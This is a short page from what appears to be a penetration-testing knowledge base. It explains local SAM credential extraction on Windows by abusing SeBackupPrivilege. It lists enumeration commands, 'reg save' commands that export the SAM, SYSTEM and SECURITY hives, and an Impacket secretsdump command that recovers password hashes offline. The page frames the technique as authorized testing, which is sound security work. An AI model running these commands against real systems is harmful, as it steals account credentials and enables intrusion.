Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter II - Local / 04. Windows / 02. Privilege Escalation / Privileges / SeBackupPrivilege

Local SAM Extraction

Local SAM extraction uses SeBackupPrivilege to copy registry hives that contain local account password material.

This is credential extraction, not a guaranteed shell. The escalation comes from cracking or reusing recovered local credentials where that is in scope.

When enumerating local SAM extraction opportunities, try to identify:

  • SeBackupPrivilege in the current token
  • Ability to export SAM, SYSTEM, and ideally SECURITY
  • Writable staging directory
  • Safe transfer path for copied hives
  • Whether local credential reuse is in scope

Enumeration

Confirm the privilege:

whoami /priv

Confirm hive locations:

dir C:\Windows\System32\config\SAM
dir C:\Windows\System32\config\SYSTEM
dir C:\Windows\System32\config\SECURITY

Interesting findings include:

  • SeBackupPrivilege present
  • Hives export successfully
  • Staging directory is writable
  • Local administrator hashes are recoverable offline

Once the hives are exported, process them offline and test reuse only where allowed.

Exploit

  1. Export the registry hives with reg save:
reg save HKLM\SAM C:\Users\Public\sam.save
reg save HKLM\SYSTEM C:\Users\Public\system.save
reg save HKLM\SECURITY C:\Users\Public\security.save
  1. Transfer the files to the analysis host.

  2. Extract local hashes offline with Impacket secretsdump.py:

secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
  1. Test recovered credentials only where allowed.